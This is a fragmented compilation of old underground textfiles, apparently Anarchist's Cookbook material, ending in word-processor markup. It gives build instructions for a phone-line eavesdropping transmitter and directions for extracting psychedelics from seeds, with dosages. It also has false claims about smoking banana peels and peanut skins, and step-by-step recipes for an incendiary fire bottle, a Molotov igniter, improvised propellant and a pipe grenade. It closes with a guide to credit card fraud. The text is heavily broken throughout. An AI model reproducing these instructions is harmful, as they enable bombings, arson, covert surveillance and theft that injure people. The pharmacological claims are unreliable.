E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HRAIN.........................97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RAN.............................9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RAQ............................96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RAEL..........................97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RDAN..........................96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UWAIT..........................96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MAN............................96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ATAR...........................97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UDI ARABIA....................96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TED ARAB EMIRATES............97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MEN ARAB REPUBLIC.............96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IBBEAN/ATLANT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NCH ANTILLES.................59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UANTANAMO BAY (US NAVY BASE)....5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ITI...........................50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HERLANDS ANTILLES............5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 PIERRE AND MIQUELON.........50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IA............................9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A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ALL CANADA, DIAL 1 + AREA C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L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XI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ALL MEXICO, DIAL 011 + 52 + CITY CODE+ LOCAL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dial international ca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tional Access Code + Country code + Routing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all Frankfurt, Germany, you would do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11 + 49 + 611 + (# wanted) + # sign(octothro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 sign at the end is to tell Bell that you are done entering in a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ed inf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finity Transmitter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iginally typed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t;&lt;Ghost Wind&gt;&g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THE BOOK BUILD YOUR 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SER, PHASER, ION RAY GUN &amp; OTHER WORKING SPACE-AGE PROJEC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Y ROBERT IANNINI (TAB BOOKS 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cription:  Briefly, the Infinity Transmitter is a device which activate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phone via a phone call.  It is plugged into the phone line, and whe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rings, it  will immediately intercept the ring and broadcast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any sound that is in the room. This device was originally made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Unlimited, and had a touch tone decoder to prevent all who did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 the code from being able to use the phone in its normal way.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sion, however, will activate the microphone for anyone who calls while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It is illegal to use this device to try to bug someone. It is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tty stupid because they are fairly notice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s L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tend that uF means micro Farad, cap= capaci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           #          Descrip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1,4,8         3         390 k 1/4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2             1         5.6 M 1/4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3,5,6         3         6.8 k 1/4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7/S1          1         5 k pot/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9,16          2         100 k 1/4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10            1         2.2 k 1/4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13,18         2         1 k 1/4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14            1         470 ohm 1/4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15            1         10 k 1/4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17            1         1 M 1/4 watt re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1             1         .05 uF/25 V disc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2,3,5,6,7     5         1 uF 50 V electrolytic cap or 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eferably non-polariz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4,11,12       3         .01 uF/50 V disc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8,10          2         100 uF @ 25 V electrolytic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9             1         5 uF @ 150 V electrolytic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13            1         10 uF @ 25 V electrolytic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M1            1         555 timer d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1             1         CA3018 amp array in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1,2           2         PN2222 npn sil tran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3             1         D4OD5 npn pwr tab transis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1,2           2         50 V 1 amp react. 1N400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1         1.5 k/500 matching transfor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1             1         large crystal micro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1             1         Phono jack optional for sense out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3            (24")     #24 red and black hook up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4            (24")     #24 black hook up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3,4          2         Alligator cli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1,2          2         6" battery snap cli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1            1         1 3/4x4 1/2x.1 perf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1            1         5 1/4x3x2 1/8 grey enclosure fa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15           (12")     #24 buss w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1            1         small plastic kno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1            1         small clamp bus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1,2           2         9 volt transistor battery or 9V ni-c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rcuit Operation: Not being the most technical guy in the world, and not be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y good at electronics (yet),  I'm just repeating what Mr. Iannini's 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the circuit operation.  The Transmitter consists of a high gr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ifier fed into the telephone lines via transformer.  The circu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itiated by the action  of  a voltage transient pulse occurring acros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line  at the instant the telephone circuit is made (the ring,  in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s).  This transient immediately triggers a timer  whose output  pin  3 g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itive, turning on transistors Q2 and  Q3. Timer TM1 now remains in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te for a period depending on the values  of R17 and C13 (usually about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onds for  the  values shown). When Q3 is turned on by the timer, a simul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 hook" condition is created by the switching action of Q3 connect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0  ohm  winding  of the transformer directly across  the  phone l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ultaneously, Q2 clamps the ground of A1, amplifier, and Q1, out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istor, to the negative return of B1,B2, therefore enabling this amplif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Note that B2 is always required by  supplying  quiescent power to TM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ring  normal conditions. System is off/on controlled by S1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crystal mike picks up the sounds that are fed to  the  first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istors of the A1 array connected as an emitter follower driv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aining  two  transistors  as  cascaded   common emitters. Outpu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ray now drives Q1 capacitively coupled to  the  1500 ohm  winding of  T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7  controls  the  pick  up sensitivity of the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ode  D1  is  forward biased at the instant of  connection  and essenti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es a negative pulse at pin 2 of TM1,  initiating the cycle.   D2 clam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high positive pulses.   C9 dc-isolates and desensitizes the circui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described should operate when any incoming call is made without ring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hematic Diagram:  Because this is text,  this doesn't look  too hot. Ple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a little imagination!  I will hopefully get  a graphics drawing  of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as soon as I  can  on  a  Fontrix graf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e able to see what everything is, this character: | should appear a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rizontal bar. I did this on a ][e using a ][e 80 column card, so I'm sorry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looks kinda weird to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mbo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stor: -/\/\/-            switch: _/ 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ttery:  -|!|!-             capacitor (electroly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or (disc): -||-                   _    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istor:(c)  &gt; (e)        Transfor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ode: |&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ip: .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 (chips are easy to recogniz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ts imply a connection between wires. NO DOT, NO CONN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  _!_ means a connection while _|_ means no conn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to GREEN wire phon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______________________to RED wire phon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M1)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R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_!_ C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this wire is the amp      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lt;=ground                   |                     R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__________!4      9     11!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__________!7            12.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A1        |              R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__________!10       ____*8!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C4             |       /       |       \                     |2m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_.      |      /        |       /R4                B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R7     |  C2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__!8*_/           |       |                 S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6!_______!           neg&lt;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C3      |               |       | C5       retu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_____|(___.__!3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5      1!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_______._______!            |             B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    R8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      R6        |3m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________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R5            |                    |                | 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C6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R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Q1 _!_                            |   R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___/ \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C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_)|_________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g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_____________.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__.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________.         |         |                       .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C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_________|_________!_______.T1.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1500 )||( 5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ohm )||( oh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Q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___!__. D1   C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______________!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________________!             C11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13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_.___|_______________________!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R16         |    R1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v   |   |                       !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neg  |   |                       |    D2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return |   |                       !_____|&lt;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1,B2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R14                    |C12 |   TM1      2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_||_!5            4!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____!1            8!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7 6   3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C13    | |    |   R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_______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C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R18                    !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O J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nse outp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truction notes: Because the damned book just gave a picture instead of step by step instructions, and I'll try to give you as much help as possible. Note that all the parts that you will be using are clearly labeled in the schematic. The perfboard, knobs, 'gator clips, etc are optional. I do strongly suggest that you do use the board!!! It will make wiring the components up much much easier than if you don't us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knob you can use to control the pot (R7). R7 is used to tune the IT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s sounds ok over the phone. (You get to determine what sounds good) By changing the value of C13, you can change the amount of time that the circuit will stay open (it cannot detect a hang up, so it works on a timer.) A value of 100 micro Farads will increase the time by about 10 times.  The switch (S1) determines whether or not the unit is operational. Closed is on. Open is off. The negative return is the negative terminals of the battery!! The batteries will look something like this when hooked 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v_____.   .______.    ._____.   .____-&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    |    |   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_/ _!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switch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9volts|         |   | 9vol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 neg return  !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ook this up to the phone line, there are three ways, depending upon what type of jack you have. If it is the old type (non modular) then you can just open up the wall plate and connect the wires from the transmitter directly to the terminals of the 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a modular jack with four prongs, attach the red to the negative prong (don't ask me which is which! I don't have that type of jack... I've only seen them in stores), and the green to the positive prong, and plug in. Try not to shock your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the clip-in type jack, get double male extension cord (one with a clip on each end), and chop off one clip. Get a sharp knife and splice off the grey protective material. You should see four wires, including one green and one red. You attach the appropriate wires from the IT to these two, and plug the other end into the w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the IT to work: If you happen to have a problem, you should attempt to do the following (these are common sense rules!!) Make sure that you have the polarity of all the capacitors right (if you used polarized capacitors, that is). Make sure that all the soldering is done well and has not short circuited something accidently (like if you have a glob touching two wires which should not be touching.) Check for other short circuits. Check to see if the battery is in right. Check to make sure the switch is clo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t still doesn't work, drop me a line on one of the Maryland or Virginia BBSs and I'll try to help you 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nse output: Somehow or other, it is possible to hook something else up to this and activate it by phone (like an alarm, flashing light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of this writing, I have not tried to make one of these, but I will. If you actually get it working, leave me a note some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e hope all you people appreciat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SD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think,  of  all the drugs on the black market today, LSD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strangest. It is the most recent major  drug  to  com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fe  in  the psychedelic subculture. (Blah blah blah... l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t to the good stuff: How to make it in your kitch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Grind up 150 grams of Morning Glory seeds or baby  Hawaii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 rose s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In 130 cc. of petroleum ether, soak the seeds for two d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Filter the solution through a tight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Throw away the liquid, and allow the seed mush to d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For  two  days  allow  the mush to soak in 110 cc. of w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coh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6) Filter the solution again, saving the liquid  and  labe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  Resoak  the  mush  in 110 cc.  of  wood  alcohol  for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 Filter and throw away the mu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 Add the liquid from the second soak to the solution labe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  Pour  the  liquid  into  a  cookie  tray  and allow i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apo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1) When all of  the  liquid  has  evaporated,  a  yellow  gu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mains. This should be scraped up and put into capsu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0 grams of Morning Glory seeds = 1 tr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5 Hawaiian wood rose seeds = 1 tri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ny  companies,  such as Northop-King have been coating the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eds with a toxic chemical, which is poison. Order seeds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wholesaler, as it is much safer and cheaper.  Hawaiian  w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ose seeds can be ordered directly fr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ong's Nursery and Flow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 Box 215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nolulu, Hawai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SD DOSA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basic dosages of acid vary according to what kind of ac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s available and what medium of ingestion is used. Chemic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otency of LSD-25 is measured in micrograms, or  mics.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re  chemically  minded  or  making  your  own  acid,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puting the number of micrograms is very important.  Usu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tween  500  and  800  mics  is  plenty  for  an 8 hour tr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pending on the quality of the acid, of course. I have  he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people taking as much as 1,500-2,000 mics. This is not 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tremely dangerous, it is extremely wastefu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SD  comes  packaged  in many different forms. The most comm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 listed be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The brown spot, or a piece of paper with a dried  dr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LSD  on it, is always around. Usually one spot equ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e tr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Capsuled acid is very tricky, as the cap can be alm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y color, size, or potency. Always ask what the acid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ut  with,  as  a lot of acid is cut with either speed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rychnine. Also note do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Small white or colored  tablets  have  been  known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tain acid, but, as with capsuled acid, it's impossi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tell potency, without ask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the Anarchist's Cookbook. Typed up by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nanas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lieve  it  or  not,  bananas  do contain a small quantity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Musa Sapientum bananadine_, which is  a  mild,  short-la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sychedelic.  There  are much easier ways of getting high,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great advantage to this method is that bananas are leg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Obtain 15 lbs. of ripe yellow banan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Peel all 15 lbs. and eat the fruit. Save the pee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With a sharp knife, scrape off the insides of the peel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ave the scraped mate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Put all of the scraped material in  a  large  pot  and  ad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ater.  Boil  for  three to four hours until it has attaine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lid paste consist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Spread this paste on cookie sheets, and dry in an over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out  20  minutes  to a half hour. This will result in a f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lack powder. Makes about  one  pound  of  bananadine  pow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usally one will feel the effects of bananadine after smo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ree or four cigaret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le of Weigh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unds         Ounces         Grams          Kilo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16             453.6          0.453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0625         1              28.35          0.028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0352         1              0.00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205          35.27          1,000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the Anarchist's Cookbook typed by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ummy Marihuana Recipes                courtesy of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apulco G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ripe avocado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chopped o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teaspoons chili pow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ablespoons wine vine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chopped marahuana (gra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x  the  vinegar,  grass,  and  chili powder together and le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xture stand for one hour. Then add avocados and onions and  ma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all together. It can be served with tacos or as a di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 So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can condensed beef bro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ablespoons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ablespoons lemon ju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an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ablespoons chopped waterc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bine  all  ingredients  in  a saucepan and bring to a boil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dium heat. Place in a  refrigerator  for  two  to  three  hou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heat, and ser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rk and Beans and P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large can (1 lb. 13 oz.) pork and be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slices bac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light mola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teaspoon hickory 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pineapple r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x  together  in a casserole, cover top with pineapple and bac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ke at 350 degrees for about 45 minutes. Serves about s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Meat B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lb. hambur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4 cup chopped o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can cream of mushroom so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4 cup bread cru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ablespoons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ablespoons India rel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x it all up and shape into meat balls. Brown in frying  pa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ain. Place in a casserole with soup and 1/2 cup water, cov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ok over low heat for about 30 minutes. Feeds about four peo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paghetti Sau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can (6 oz.) tomato pas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tablespoons olive o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chopped o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chopped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pinch pep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can (6 oz.)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love minced garl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bay lea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pinch thy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teaspoon sa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x  in large pot, cover and simmer with frequent stirring for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urs. Serve over spaghett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 Loa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packet onion soup m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16 oz.) can whole peeled tomat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chopped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lbs. ground beef or chicken or tur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eg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slices bread, crumbl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x all ingredients and shape into a loaf. Bake for  one  hour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00-degree oven. Serves about s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ili Bean P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lbs. pinto be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lb. bacon, cut into two-inch se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cups red w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tablespoons chili pow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love garl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cup chopped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mushroo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ak  beans  overnight in water. In a lagre pot pour boiling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ver beans and simmer for at least an hour, adding more  wat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keep  beans covered. Now add all other ingredients and continu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mmer for another three hours. Salt to taste. Serves about t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ird Stuff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cups rye bread crumb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tablespoons poultry seaso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each of raisins and almo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cel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3 cup chopped o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ablespoons melted bu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chopped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tablespoons red w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x it all together, and then stuff it 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pple P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apples (co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brown su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4 cup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cher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3 cup chopped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tablespoons cinnam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wder the grass in a blender, then mix grass with sugar and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uff cores with this paste. Sprinkle apples  with  cinnamo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p with a cherry. Bake for 25 minutes at 350 degre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 Brown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fl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ablespoons shorte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tablespoons hon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egg (beat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tablespoon w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inch of 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4 teaspoon baking pow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su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tablespoons corn syr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square melted chocol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teaspoon vanil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chopped nu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ft  flour,  baking  powder,  and  salt together. Mix shorte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gar, honey, syrup, and egg. Then blend in  chocolate  and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gredients, and mix well. Spread in an 8-inch pan and bake for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nutes ate 350 degre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nana Br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shorte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eg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teaspoon lemon ju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easpoons baking pow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cup sug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cup mashed banan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cups sifted fl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cup chopped gra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teaspoon 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cup chopped nu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x the shortening and sugar, beat eggs, and add to mix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perately  mix  bananas  with  lemon  juice  and  add to the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xture. Sift flour, salt, and baking powder  together,  then  m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l ingredients together. Bake for 1 1/4 hours at 375 degre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same Seed Cook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oz. ground roast sesame s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tablespoons ground almo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4 teaspoon nutme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4 cup hon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2 teaspoon ground gin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4 teaspoon cinnam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4 oz. gra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ast  the  grass  until  slightly  brown  and  then crush it i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rtar. Mix  crushed  grass  with  all  other  ingredients,  i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killet. Place skillet over low flame and add 1 tablespoon of sa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utter.  Allow  it  to  cook.  When cool, roll mixture into li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lls and dip them into the sesame see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you happen to be in the country at a place where pot  is  be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rown,  here's  one  of  the  greatest recipes you can try. Pick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dium-sized leaf off of the marihuana plant and dip it into a c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drawn butter, add salt, and e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the Anarchist's Cookboo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anut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y this sometime when you are bo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Take one pound of raw peanuts (not roas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Shell them, saving the skins and discarding the she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Eat the nu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Grind up the skins and roll them into a cigarette, and smo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ll have fun, believe m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emical Fire Bottl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ncendiary bottle is self-igniting on target imp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terials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 Used               Common Sour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lphuric Acid           Storage Batteries      Motor Vehic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terial Processing    Industrial Pl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asoline                 Motor Fuel             Gas Station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tor Vehic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Chlorate       Medicine               Drug Sto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gar                    Sweetening Foods       Food St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lass bottle with stopper (roughly 1 quart siz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mall Bottle or jar with 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ag or absorbant paper (paper towels, newspa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ring or rubber b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Sulphuric  Acid MUST be concentrated. If battery acid or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lute acid is used, concentrate it by boiling until  dense  wh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umes  are  given  off.  Container  used  to  boil  should  b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amel-ware or oven gla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UTION: Sulphuric Acid will burn skin and  destroy  clothing.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y is spilled, wash it away with a large quantity of water. Fu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 also VERY dangerous and should not be inhal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Remove  the  acid  from  heat  and  allow  to  cool  to  ro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mpera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Pour gasoline into the large  (1  quart)  bottle  until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pproximately 1/3 fu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Add  concentrated  sulphuric acid to gasoline slowly unti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ttle is filled to within 1" to 2" from top. Place the stopper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bott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Wash the outside of the bottle thoroughly with clear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UTION: If this is not done, the fire bottle may be dangerou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ndle during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6)  Wrap a clean cloth or several sheets of absorbant paper a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outside of the bottle. Tie with string or fasten  with  rub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  Dissolve 1/2 cup (100 grams) of potassium chlorate and 1/2 c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00 grams) of sugar in one cup (250 cc) of boiling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 Allow the solution to cool, pour into the small bottle and  c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ightly.  The  cooled  solution should be approx. 2/3 crystal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3 liquid. If there is more than this,  pour  off  excess  b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UTION: Store this bottle seperately from the  other bott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 To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Shake the small bottle to mix contents and pour onto the clo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paper around the large bottle. Bottle can be used wet or  af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lution is dried. However, when dry, the sugar-Potassium chlo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xture  is very sensitive to spark or flame and should be hand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ording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Throw or launch the bottle. When the bottle  breaks  agains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rd surface (target) the fuel will ign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gniter from Book Matches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a  hot  igniter made from paper book matches for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molotov cocktail and other incendia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per book matc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hesive or friction ta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Remove the staple(s) from match book and seperate matches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Fold and tape one row of matches (fold in thi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Shape the cover into a tube with striking surface on the in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tape.  Make sure the folder cover will fit tightly arou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ped match heads. Leave cover open at opposite end for  inser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matc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Push the taped matches into the tube until the bottom end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posed about 3/4 in. (2 c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Flatten and fold the open end of the tube so that it laps  o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out 1 in. (2-1/2 cm); tape in pl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 with a Molotov Cockt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Tape  the  "match  end  tab" of the igniter to the neck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lotov cockt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Grasp the "cover and  tab"  and  pull  sharply  or  quickl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gn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neral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book  match igniter can be used by itself to ignite flamm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quids, fuse cords, and similar items requiring hot ign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AUTION: Store matches and  completed  igniters  in  moisturepro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tainers  such  as  rubber  or plastic bags until ready for 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mp or wet paper book matches will not ign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d or White Powder" Propellant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d or White Powder" Propellant may be prepared in a  sim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afe  manner.  The  formulation  described  below  will  result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pproximately 2 1/2  pounds  of  powder.  This  is  a  small  ar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pellant  and  should  only  be  used  in  weapons  with 1/2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ameter or less (but not pisto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at Source (Kitchen Stove or open f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gallon metal buck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asuring cup (8 ou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en spoon or rubber spatu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tal sheet or aluminum foil (at least 18 in. sq.)</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lat window screen (at least 1 foot squ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Nitrate (granulated) 2-1/3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ite sugar (granulated) 2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wdered ferric oxide (rust) 1/8 cup (if avail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lear water, 1-1/2 cu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Place the sugar, potassium nitrate, and water  in  the  buck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at  with  a low flame, stirring occasionally until the suga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tassium nitrate dissol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If available, add the ferric  oxide  (rust)  to  the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crease the flame under the mixture until it boils gent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The mixture will retain the rust colo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Stir and scrape the bucket sides occasionally until the mix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s  reduced  to  one  quarter  of  its  original volume, then st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tinuous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As the water evaporates, the mixture will become thicker  unt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reaches the consistency of cooked breakfast cereal or homem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udge. At this stage of thickness, remove the bucket from the he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urce, and spread the mass on the metal she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While the material cools, score it with a spoon or  spatula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risscrossed furrows about 1 inch ap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6)  Allow the material to dry, preferably in the sun. As it d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sore it accordingly (about every 20 minutes) to aid dry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 When the material has dried to a point  where  it  is mois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ft  but  not  sticky to the touch, place a small spoonful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creen. Rub the material back and forth against  the  screen  me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spoon  or other flat object until the material is granul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to small worm-like partic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 After granulation, return the material to the sun to  allow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y complete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ipe Hand Grenade                           by the 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nd  Grenades  can  be  made  from  a piece of iron pip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iller  can  be  of  plastic  or  granular   military   explos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provised  explosive,  or  propellant  from shotgun or small ar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un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terial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ron Pipe, threaded ends, 1-1/2" to 3" diameter, 3" to 8" lo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wo (2) iron pipe ca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plosive or propell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nelectric blasting cap (Commercial or milit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use c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nd Dr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li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Place blasting cap on one end  of  fuse  cord  and  crimp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li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To find out how long the fuse cord should be, check the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takes a known length to burn. If 12 inches burns in 30 seco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6 inch cord will ignite the grenade in 15 seco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Screw  pipe  cap  to one end of the pipe. Place fuse cord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lasting cap into the opposite end so that  the  blasting  cap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ar the center of the pi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If  plastic  explosive  is  to  be  used,  fill pipe B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ing blasting cap. Push a round stick into the center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plosive to make a hole and then insert the blasting ca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Pour explosive or propellant into pipe a little bit at a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p the base of the pipe frequently to settle fil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Drill a hole in the center of  the  unassembled  pipe  capl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ough for the fuse cord to pass throug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Wipe  pipe  threads  to  remove any filler material. Slid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illed pipe cap over the fuse and screw handtight onto the pi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ady to g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lly Ro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K. CREDIT CARD FRAUD - 22/10/90 - Written by CREDITM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K. credit card fraud is a lot  easier  than over in the State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basic 3 essentials are nee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A safeh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Credit card numbers with Xp date and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Good suppliers of next day delivery goo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The Safeh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afehouse should be on the ground floor, so as not to piss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livery man when he comes  to  drop off your freshly stolen g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he has to go up 10 flights in  a complete dive and some 14 year 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d signs for an A2000 then he's gonna wonder!  Make sure there ar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sey neighbours, a good area is one  full of yuppies 'cos they all g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work during daytime.  Safehouses  are  usually obtained by paying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th's rent in  advance  or  putting  down  a  deposit  of say, £2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ther that or break into a place and use th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Credit Card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rd number, expiry  date,  start  date  (if  possible), full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uding middle inital), phone number and full address with post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ideal.  If you can  only  get  the  sirname,  and no postcod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n't have any real hassle.  Just  say  you moved recently to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address.  Phone number is handy, if it just rings and rings but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doesn't, then make  sure  it's  ex-directory.   You CANNOT get a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giving them a bullshit  phone  number.  Some fussy companies w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e numbers just to cross-check  on  CARDNET  but generally it'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ed.  To recap, here's a quick check-li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Card number and Xpiry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Name and address of card hol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First name/initials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Start date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Postcode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6.Phone number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all 6, then you  shouldn't have any hassle.  Start dat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arest item you could  be  asked  for,  postcode and initals be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common.  If you are missing 3-6 then you need one helluva smoo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bastard on the ph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The Orde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everyone can order £1000's of stuff  - it's not easy.  You hav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cool, smooth and  have  some  good  answers  to their questions.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vise that you only order up to £500 worth of stuff in one go, but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ave details 1-6 and the phone number will NOT be answered from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30 P.M. then go up to  £1000  (make  sure  it's a GOLD card!).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ready to order make sure you  have at least 3 times the amou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suppliers you need e.g.if you want to card 5 hard-drives, make s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ave 15 suppliers.  A lot of  the time, they are either out st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do next day delivery or won't deliver to a different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ck check list of what you must ask before handing over num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Next day delivery, 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Ordered to different address to card, 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Do you have item in stock (pretty obvious, e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sure you ask  ALL  of  these  questions  before handing over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cious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u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ual excuses for a  different  address  are  that  it's  a present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on business here for the  next  5  weeks etc.  Any old bullsh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y it won't go to the proper add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Invoices!*******WAR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oices are sometimes sent out  with  the  actual parcel but they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sent out to the  card  owners  (why  do  you  think they nee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 for?) so using a safehouse for more than 2 days is risky.  A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y shot is safe, if they catch  on then they'll stop the goods b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a search warra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edit Lim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mits on cards reach from £500 to  £4000 on Gold cards.  Your aver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 will be about £1000-£1500.  It takes  a  while to build up a go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edit rating in order to have large  limits so don't think every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hold 12 IBM 386's!  Visa  and  Access  are always used - Ameri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press etc. are USEL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ccess = Eurocard, Mastercard (begins with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isa = (begins with 4, 16 digit is a G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general rule is, always  confirm  an  order  to  make sure cred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red.  As the month goes on, credit is  used up - the bad tim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27th - 3rd which is  when  all  the  bills come in.  Best tim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d is around 11th or 12th, when  the  poor guy has paid off his l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ll so you can run up a new one (he, he, h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al items to c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est stuff is always computer hard-ware as it's next-day.  Amig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s, PC's -  anything  really.   Blank  discs  are  a  waste of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re too heavy.  Xternal drives,  monitors  - good stuff basic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order  any  shit   like   VCR's,  hi-fi,  video-cameras,  mus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boards, computer software, jewerely or anything under £300.  You'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d the listed items  are  difficult  to  get  next  day delivery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ually won't deliver to a  different  address - bastards, eh?  Yo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ting your time with little items under £300, try to keep delive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 10 a d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r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ways of doing the dr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Sign for all the gear (make  sure you're there between 9.00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30 P.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Don't turn up till around 6.30  P.M.  and collect all the ca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the delivery man has left.  These usually say 'you were out at X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so could you please  arrange  new  time  for  delivery or pick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our depot'.  In that case, piss off  to the depot and get a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ar (need a big c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carding is ILLEGAL  kiddies,  so  don't get caught.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:left="1008" w:right="360" w:gutter="0" w:header="0" w:top="720"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